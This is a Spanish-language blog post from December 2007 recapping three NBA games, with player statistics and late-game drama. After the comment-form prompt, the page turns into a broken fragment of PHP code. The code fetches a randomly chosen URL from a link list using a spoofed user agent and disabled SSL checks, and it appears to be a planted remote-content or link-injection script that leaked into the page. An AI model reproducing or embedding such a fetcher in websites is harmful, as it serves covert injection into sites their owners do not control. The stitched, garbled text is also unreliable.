La crónica (20/12/07)

21 de December de 2007 por MagicJohnson32

Tres partidos disputados, tres finales emocionantes, tres prórrogas (dos en el mismo partido), dos canastas sobre la bocina, un héroe inesperado… y muchas cosas que contar en nuestra crónica de los partidos jugados anoche en la NBA. La jornada registró triunfos de Nets, Cavs y Nuggets sobre Heat, Lakers y Rockets.

kobeguardslebron

Os dejamos con la crónica de estos tres encuentros:

Nets 107 – 103 Heatantoinefloor

Wade ya está al 100% y, en contra de la apariencia, no son buenas noticias para Miami. No lo son porque los Heat siguen perdiendo pese a las exhibiciones anotadoras de su estrella, que tras sumar 30 y 36 en los dos partidos anteriores, anoche logró 41 frente a los Nets. Aun así, los de New Jersey fueron capaces de lograr otra ajustada victoria, un apartado en el que se están especializando. De la mano de Carter, autor de 31 puntos, 8 rebotes y 6 asistencias, y Jefferson, que logró 29 puntos y 8 rebotes, los Nets superaron a los Heat en los últimos minutos y sólo un lanzamiento de Haslem en el último segundo llevó el partido hasta la prórroga, algo que sólo sirvió para posponer 5 minutos más la 19ª derrota de Miami en lo que va de temporada. Algo falla cuando Shaquille O’Neal (12 puntos, 7 rebotes, 2 asistencias) tiene el mismo protagonismo en el juego de los Heat que el que Josh Boone tiene en el de los Nets (11 puntos, 8 rebotes, 2 tapones). El juego de los Nets estuvo, como siempre, dirigido por Jason Kidd, que sólo anotó 5 puntos pero repartió 10 asistencias y atrapó 10 rebotes, y la aportación más sorprendente fue la de Malik Allen, ex heat, que hizo 9 de 11 en tiros de campo. Para los Heat, al margen de los 41-5-6 de Wade y los 18-12 de Haslem, Dorrell Wright consiguió 13 puntos, 7 rebotes y 3 tapones.

Lakers 90 – 94 Cavs bynumvarejao

El siempre anunciado duelo de estrellas entre Kobe y LeBron deparó un partido igualado con victoria de James y los Cavs sobre Bryant y los Lakers. El encuentro discurrió sin diferencias superiores a los cuatro puntos hasta el tramo final del tercer periodo. Bryant se fue al banco a 35 segundos para el final del cuarto con los Lakers 7 arriba (78-71) pero cuando regresó a cancha apenas 3 minutos después, su equipo marchaba 5 abajo (78-83). Los Lakers fueron capaces de reaccionar y a falta de 4 minutos para el final se situaron por encima (90-88). Sin embargo, desde ese momento no pudieron anotar, ni siquiera con los dos tiros libres de que dispuso Bynum a falta de 11 segundos con sólo 2 puntos de diferencia en el marcador. La acción más polémica llegó con un rebote ofensivo de Fisher a 3 segundos de la conclusión, en el que los árbitros señalizaron falta del veterano base sobre Gibson, quien aprovechó los tiros libres para sellar un importante triunfo para los de Ohio. James lideró a los Cavs, que se sitúan con 12-15, con 33 puntos, 10 rebotes y 5 asistencias, acompañado por los 15 puntos de Gibson, y los 11 con 15 rebotes de Varejao. Por su parte, Kobe se quedó en 21-5-5, al igual que James con malos porcentajes, y Odom, Bynum y Fisher fueron las únicas aportaciones sólidas (el banquillo, clave en otras ocasiones, sólo logró 7 puntos) de los Lakers, que aumentan su cifra de derrotas y su balance ahora es de 15-10.

anthonycarteratkins Rockets 111 – 112 Nuggets

Dos prórrogas fueron necesarios para decidir al vencedor del encuentro. Después de 58 minutos de duro partido, tremendamente igualado con diferencias nunca superiores a 10 puntos y múltiples alternancias en el marcador, apareció la figura de Anthony Carter para, sobre la bocina, dar el triunfo a Denver y demostrar la importancia de rodear a tus figuras con jugadores capaces de asumir responsabilidades en momentos puntuales. Durante todo el partido fueron Iverson (36 puntos y 9 asistencias) y Melo (37 puntos y 16 rebotes, récord personal) los que mantuvieron a los Nuggets en el partido, junto con la solidez habitual de Marcus Camby bajo los tableros (18 rebotes). Enfrente, unos Rockets sin su principal figura, un Tracy McGrady que se lesionó en el último partido disputado por los texanos, tuvieron en Yao Mig a su mejor hombre con 26 puntos, 19 rebotes y 6 asistencias. Destacaron también Rafer Alston, que se quedó cerca del triple-doble con 18 puntos, 7 rebotes y 10 asistencias, y Luther Head que, sustituyendo a T-Mac en el quinteto inicial, acabó con 22 puntos, 6 asistencias y 4 rebotes. Con esta victoria Denver mantiene el liderato en la división Northwest.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>